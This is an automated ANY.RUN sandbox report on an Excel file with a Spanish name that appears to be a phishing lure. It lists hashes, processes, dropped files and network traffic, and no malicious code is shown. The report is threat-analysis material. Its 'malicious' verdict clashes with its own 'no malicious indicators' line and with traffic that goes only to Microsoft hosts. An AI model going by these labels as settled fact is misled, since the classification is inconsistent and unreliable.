analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Solicitud de cotizaciòn..xlsx

Full analysis: https://app.any.run/tasks/a7ed4b30-3199-425f-a958-787c2b10a6c1
Verdict: Malicious activity
Analysis date: December 05, 2022, 18:15:51
OS: Windows 10 Professional (build: 19044, 64 bit)
Indicators:
MIME: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet
File info: Microsoft Excel 2007+
MD5:

CD9567E232B722B34985981E32633321

SHA1:

3B1FDB9DACD8A1F20FDC0F03D2088855924452A7

SHA256:

7AE8B3795F2EFFF6E153B1290633C327A5D3ADE19F40ECC0A891579ED5587C61

SSDEEP:

24576:Cmv7PSn7ViMIY4oSX6fM1lPH/VE+njnkLQp:CmMVHfSlPHJngEp

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Reads settings of System Certificates

      • SLUI.exe (PID: 2496)
      • slui.exe (PID: 2416)
    • Process requests binary or script from the Internet

      • EXCEL.EXE (PID: 2888)
  • INFO

    • Checks proxy server information

      • EXCEL.EXE (PID: 2888)
      • slui.exe (PID: 2416)
    • Reads the software policy settings

      • slui.exe (PID: 2416)
      • SLUI.exe (PID: 2496)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xlsx | Excel Microsoft Office Open XML Format document (61.2)
.zip | Open Packaging Conventions container (31.5)
.zip | ZIP compressed archive (7.2)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
133
Monitored processes
6
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start excel.exe sppextcomobj.exe no specs slui.exe filecoauth.exe no specs filecoauth.exe no specs slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
2888"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\admin\Desktop\Solicitud de cotizaciòn..xlsx"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
Explorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
16.0.12026.20264
Modules
Images
c:\program files\microsoft office\root\office16\excel.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ole32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\combase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\win32u.dll
6096C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\WINDOWS\system32\SppExtComObj.exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Exit code:
0
Version:
10.0.19041.1202 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
2496"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\WINDOWS\System32\SLUI.exe
SppExtComObj.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
5604C:\Users\admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\FileCoAuth.exe -EmbeddingC:\Users\admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\FileCoAuth.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft OneDriveFile Co-Authoring Executable
Exit code:
0
Version:
19.043.0304.0013
Modules
Images
c:\users\admin\appdata\local\microsoft\onedrive\19.043.0304.0013\filecoauth.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\win32u.dll
4188C:\Users\admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\FileCoAuth.exe -EmbeddingC:\Users\admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\FileCoAuth.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft OneDriveFile Co-Authoring Executable
Exit code:
0
Version:
19.043.0304.0013
Modules
Images
c:\users\admin\appdata\local\microsoft\onedrive\19.043.0304.0013\filecoauth.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\win32u.dll
2416C:\WINDOWS\System32\slui.exe -EmbeddingC:\WINDOWS\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
Total events
11 448
Read events
11 240
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
9
Text files
3
Unknown types
2

Dropped files

PID
Process
Filename
Type
2888EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Solicitud de cotizaciòn..xlsx.LNKlnk
MD5:F0B77DDCF9B3DEC544184F523AA95240
SHA256:E7B1BF3B2E75B0EC19E4C9B0B4EE80D8084B7CDADC3065AE771F61DD93D64323
2888EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.datini
MD5:A2CB95355DE5394796E2AF7C5CC7ECF4
SHA256:F8F5E9FDF4CB865161E6BB8864E67B6E73C5EB050880FC51783658C268AB496B
2888EXCEL.EXEC:\Users\admin\AppData\Local\Temp\.sestext
MD5:B53D0E2ABEB41FB3657AE78D88AABF8D
SHA256:C6C82E5E7DD9BC7871D6E5B0F188438250FB61A537252DD0C4769123F47F5A78
4188FileCoAuth.exeC:\Users\admin\AppData\Local\Microsoft\OneDrive\logs\Common\FileCoAuth-2022-12-05.1818.4188.1.odlbinary
MD5:90BCB1099FD0E24AB8C78F51F1BE926A
SHA256:7B437457486B486A5E4BD4BFAEC352E5418A132DD20FFFBE03109879C25AF4C1
5604FileCoAuth.exeC:\Users\admin\AppData\Local\Microsoft\OneDrive\logs\Common\FileCoAuth-2022-12-05.1818.5604.1.odlbinary
MD5:C0005BFDE850EEEBCA7958CF20B24E36
SHA256:AD973165C34D551FB3618D0EE34DC6B32A876D1E45324ECA20CF8B54568EE9D7
2888EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4VA93XNAVBMIOECWAWBI.tempbinary
MD5:4FCB2A3EE025E4A10D21E1B154873FE2
SHA256:90BF6BAA6F968A285F88620FBF91E1F5AA3E66E2BAD50FD16F37913280AD8228
2888EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms~RF10908a.TMPbinary
MD5:4FCB2A3EE025E4A10D21E1B154873FE2
SHA256:90BF6BAA6F968A285F88620FBF91E1F5AA3E66E2BAD50FD16F37913280AD8228
4188FileCoAuth.exeC:\Users\admin\AppData\Local\Microsoft\OneDrive\logs\Common\FileCoAuth-2022-12-05.1818.4188.1.aodlbinary
MD5:923BF0E545D9C37CA8874C8D6C4A30E6
SHA256:AB32C675D35DDBEBFCF8B11720C3E550024E8D0DF557838F17186377E3D0FE65
2888EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\F9OGI6VYLGWI11T5LI8T.tempbinary
MD5:E4A1661C2C886EBB688DEC494532431C
SHA256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
5604FileCoAuth.exeC:\Users\admin\AppData\Local\Microsoft\OneDrive\logs\Common\FileCoAuth-2022-12-05.1818.5604.1.aodlbinary
MD5:923BF0E545D9C37CA8874C8D6C4A30E6
SHA256:AB32C675D35DDBEBFCF8B11720C3E550024E8D0DF557838F17186377E3D0FE65
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
71
TCP/UDP connections
88
DNS requests
50
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2888
EXCEL.EXE
GET
200
13.107.42.16:443
https://config.edge.skype.com/config/v2/Office/excel/16.0.12026.20264/Production/CC?&Clientid=%7bD61AB268-C26A-439D-BB15-2A0DEDFCA6A3%7d&Application=excel&Platform=win32&Version=16.0.12026.20264&MsoVersion=16.0.12026.20194&Audience=Production&Build=ship&Architecture=x64&Language=en-US&SubscriptionLicense=false&PerpetualLicense=2019&Channel=CC&InstallType=C2R&SessionId=%7bE7BA5CF1-A3E3-42A7-B538-2BB4252A395A%7d&LabMachine=false
US
text
170 Kb
whitelisted
1700
sihclient.exe
GET
304
40.125.122.176:443
https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19044.1288/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.1288&MK=DELL&MD=DELL
US
whitelisted
2916
svchost.exe
GET
23.216.77.6:80
http://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl
US
whitelisted
1700
sihclient.exe
GET
72.246.169.155:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
NL
whitelisted
1700
sihclient.exe
GET
200
2.19.126.97:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
DE
der
1.11 Kb
whitelisted
1700
sihclient.exe
GET
200
23.216.77.6:80
http://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl
US
der
555 b
whitelisted
1012
svchost.exe
POST
200
40.126.32.134:443
https://login.live.com/RST2.srf
US
xml
1.25 Kb
whitelisted
1700
sihclient.exe
GET
72.246.169.155:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.2.crl
NL
whitelisted
1012
svchost.exe
POST
200
40.126.32.134:443
https://login.live.com/RST2.srf
US
xml
1.25 Kb
whitelisted
2916
svchost.exe
GET
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.3.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2724
svchost.exe
40.113.103.199:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
2.19.126.87:80
crl.microsoft.com
Akamai International B.V.
DE
unknown
1012
svchost.exe
40.126.32.134:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
1700
sihclient.exe
40.125.122.176:443
slscr.update.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
suspicious
2888
EXCEL.EXE
52.109.88.191:443
officeclient.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
2888
EXCEL.EXE
13.107.42.16:443
config.edge.skype.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
1700
sihclient.exe
2.19.126.97:80
crl.microsoft.com
Akamai International B.V.
DE
suspicious
1700
sihclient.exe
2.19.126.87:80
crl.microsoft.com
Akamai International B.V.
DE
unknown
2888
EXCEL.EXE
52.109.13.62:443
nexusrules.officeapps.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
suspicious
1700
sihclient.exe
88.221.169.152:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted

DNS requests

Domain
IP
Reputation
officeclient.microsoft.com
  • 52.109.88.191
whitelisted
slscr.update.microsoft.com
  • 40.125.122.176
  • 52.152.110.14
whitelisted
crl.microsoft.com
  • 2.19.126.87
  • 2.19.126.97
  • 23.216.77.6
  • 23.216.77.28
  • 95.101.54.122
  • 95.101.54.128
whitelisted
www.microsoft.com
  • 88.221.169.152
  • 72.246.169.155
  • 23.3.109.244
  • 2.18.233.62
whitelisted
config.edge.skype.com
  • 13.107.42.16
whitelisted
nexusrules.officeapps.live.com
  • 52.109.13.62
whitelisted
self.events.data.microsoft.com
  • 13.69.239.72
  • 20.189.173.11
whitelisted
client.wns.windows.com
  • 40.113.110.67
  • 40.113.103.199
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 40.77.2.164
  • 2603:1020:2:3::67
whitelisted
settings-win.data.microsoft.com
  • 51.124.78.146
  • 40.127.240.158
  • 4.231.128.59
  • 20.73.194.208
whitelisted

Threats

PID
Process
Class
Message
3620
svchost.exe
Misc activity
ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent
3620
svchost.exe
Misc activity
ET INFO Windows OS Submitting USB Metadata to Microsoft
3620
svchost.exe
Misc activity
ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent
3620
svchost.exe
Misc activity
ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent
3620
svchost.exe
Misc activity
ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent
3620
svchost.exe
Misc activity
ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent
3620
svchost.exe
Misc activity
ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent
3620
svchost.exe
Misc activity
ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent
3620
svchost.exe
Misc activity
ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent
3620
svchost.exe
Misc activity
ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent
No debug info